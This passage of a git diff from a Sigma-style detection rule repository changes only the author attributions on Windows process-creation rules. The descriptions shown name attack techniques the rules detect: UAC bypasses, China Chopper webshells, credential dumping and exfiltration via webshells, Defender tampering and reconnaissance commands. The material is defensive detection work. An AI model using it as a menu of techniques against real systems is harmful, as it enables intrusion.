https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/19 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_sysnative.yml b/rules/windows/process_creation/proc_creation_win_sysnative.yml index 947f1a7cc..30acf4a3d 100644 --- a/rules/windows/process_creation/proc_creation_win_sysnative.yml +++ b/rules/windows/process_creation/proc_creation_win_sysnative.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) references: - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/08/23 tags: - attack.t1055 diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index d8694c9c0..c40e86963 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -5,7 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold references: - https://twitter.com/GelosSnake/status/934900723426439170 - https://asec.ahnlab.com/en/39828/ -author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 modified: 2023/01/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml b/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml index dbf1748d7..09647dbfb 100644 --- a/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml +++ b/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml @@ -7,7 +7,7 @@ status: experimental description: Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml b/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml index fb5d4e3f2..18293b29f 100644 --- a/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml +++ b/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml @@ -4,7 +4,7 @@ status: test description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/05/22 modified: 2023/01/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml b/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml index b9162caf8..0bfffb9ed 100644 --- a/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml +++ b/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml @@ -6,7 +6,7 @@ references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ - https://www.nirsoft.net/utils/nircmd2.html#using -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/01/24 modified: 2022/11/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml b/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml index 38e7f2a40..1fec8f538 100644 --- a/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml @@ -6,7 +6,7 @@ references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ - https://www.nirsoft.net/utils/nircmd2.html#using -author: 'Florian Roth, Nasreddine Bencherchali @nas_bench' +author: 'Florian Roth (Nextron Systems), Nasreddine Bencherchali @nas_bench' date: 2022/01/24 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml b/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml index ab0472a4f..276b58586 100644 --- a/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml @@ -5,7 +5,7 @@ description: Detects the use of NSudo tool for command execution references: - https://nsudo.m2team.org/en-us/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/01/24 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml b/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml index 9d0d56d4f..9d3099b36 100644 --- a/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml @@ -5,7 +5,7 @@ description: Detects the use of RunXCmd tool for command execution references: - https://www.d7xtech.com/free-software/runx/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/24 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml b/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml index 1fe21b0ba..416e4d49b 100644 --- a/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml +++ b/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml @@ -9,7 +9,7 @@ references: - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire - https://www.localpotato.com/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/24 modified: 2023/01/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml b/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml index 04a83dcbb..4dfe578e0 100644 --- a/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml +++ b/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml @@ -4,7 +4,7 @@ status: test description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/31 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml b/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml index 4cd1b2a77..ea7421f86 100644 --- a/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml +++ b/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml @@ -8,7 +8,7 @@ description: Detects when a user enable developer features such as "Developer Mo references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml index 403f458c6..23e9805b0 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml @@ -6,7 +6,7 @@ references: - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b - https://github.com/hfiref0x/UACME - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml index 996a7be80..36a16b002 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml index c2fd21940..33b8c6454 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml index 8c6f655a7..be3f6eb6e 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml index ad66ff325..3113412c5 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml @@ -8,7 +8,7 @@ description: Detects the pattern of UAC Bypass using Event Viewer RecentViews references: - https://twitter.com/orange_8361/status/1518970259868626944 - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/22 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index 8ac38202b..36a3e2749 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/13 modified: 2022/09/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml index 16db3f2b4..002eda801 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the "IDiagnosticProfileUAC" UAC bypass technique references: - https://github.com/Wh04m1001/IDiagnosticProfileUAC -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/03 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml index f05355a62..dbf495ec2 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml index cc833b1cb..1044386ef 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml index 5168dac7f..e343b0369 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml index 8969c1e7b..54f19503c 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml index 31b9b9b11..4c5a55613 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml index 90998f3f6..4e59df648 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml index fc048cf4e..bf66d4460 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml @@ -6,7 +6,7 @@ references: - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ - https://github.com/hfiref0x/UACME - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml index 8ac47c9a4..414290776 100644 --- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml +++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml @@ -8,7 +8,7 @@ description: Detects usage of the Get-ADUser cmdlet to collect user information references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 modified: 2022/11/17 tags: diff --git a/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml b/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml index 19ee29656..827c6c797 100644 --- a/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml +++ b/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml @@ -10,7 +10,7 @@ description: Detects usage of the "Set-Service" powershell cmdlet to configure a references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/17 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml index 3cced3cf2..0552624be 100644 --- a/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml @@ -5,7 +5,7 @@ description: Detects uncommon or suspicious child processes spawning from a VsCo references: - https://twitter.com/nas_bench/status/1618021838407495681 - https://twitter.com/nas_bench/status/1618021415852335105 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/26 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml b/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml index baf6fbb3b..673b6005c 100644 --- a/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml +++ b/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml @@ -4,7 +4,7 @@ status: test description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect references: - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2023/02/01 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml index 1a188d5a9..da7a7abe1 100644 --- a/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml +++ b/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml @@ -6,7 +6,7 @@ references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 modified: 2022/09/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml b/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml index f5720ce04..9af0a9a14 100644 --- a/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml +++ b/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml @@ -6,7 +6,7 @@ references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 modified: 2022/09/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml index 89d1ac20b..8bbd0d7de 100644 --- a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml @@ -6,7 +6,7 @@ references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/14 modified: 2022/09/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml b/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml index dceba6165..ff711d765 100644 --- a/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml +++ b/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ -author: Florian Roth (rule), MSTI (query) +author: Florian Roth (Nextron Systems), MSTI (query) date: 2022/10/01 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_webshell_detection.yml b/rules/windows/process_creation/proc_creation_win_webshell_detection.yml index 723889fa4..222a150a4 100644 --- a/rules/windows/process_creation/proc_creation_win_webshell_detection.yml +++ b/rules/windows/process_creation/proc_creation_win_webshell_detection.yml @@ -5,7 +5,7 @@ description: Detects certain command line parameters often used during reconnais references: - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/ -author: Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community date: 2017/01/01 modified: 2022/05/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml b/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml index 4822d1a9d..6cde34743 100644 --- a/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml +++ b/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml @@ -4,7 +4,7 @@ status: experimental description: Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system references: - https://youtu.be/7aemGhaE9ds?t=641 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/17 modified: 2022/08/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml b/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml index 7fbd71e88..e7da4c834 100644 --- a/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml +++ b/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml @@ -4,7 +4,7 @@ status: test description: Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack references: - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update) +author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2022/09/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml index b6c832c27..75e74fecb 100644 --- a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the wevtutil utility to perform reconnaissance references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 modified: 2023/01/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml b/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml index d37b66104..75ece93e3 100644 --- a/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml +++ b/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml @@ -5,7 +5,7 @@ description: Detects a whoami.exe executed by privileged accounts that are often references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://nsudo.m2team.org/en-us/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/28 modified: 2022/05/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_whoami_priv.yml b/rules/windows/process_creation/proc_creation_win_whoami_priv.yml index 7370c9299..d4e68ae09 100644 --- a/rules/windows/process_creation/proc_creation_win_whoami_priv.yml +++ b/rules/windows/process_creation/proc_creation_win_whoami_priv.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/05 modified: 2022/05/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 2ac009b49..7c50158d1 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -5,7 +5,7 @@ description: Detects suspicious children spawned via the Windows Terminal applic references: - https://persistence-info.github.io/Data/windowsterminalprofile.html - https://twitter.com/nas_bench/status/1550836225652686848 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/25 modified: 2023/01/22 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml index a2615d740..6c5a5daf9 100644 --- a/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml +++ b/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml @@ -5,7 +5,7 @@ description: Detects a WMI backdoor in Exchange Transport Agents via WMI event f references: - https://twitter.com/cglyer/status/1182389676876980224 - https://twitter.com/cglyer/status/1182391019633029120 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/11 modified: 2022/03/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml index dee3a59b6..cb94f2dbd 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/08 modified: 2022/11/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml b/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml index f6ab207ee..4828ad28c 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml @@ -5,7 +5,7 @@ description: Detects wmic known recon method to look for installed hotfixes, oft references: - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml b/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml index f5a91fe30..44982d71c 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml @@ -8,7 +8,7 @@ references: - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2021/01/30 modified: 2023/01/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_wmic_service.yml b/rules/windows/process_creation/proc_creation_win_wmic_service.yml index 1d14f4df2..55ec089c3 100644 --- 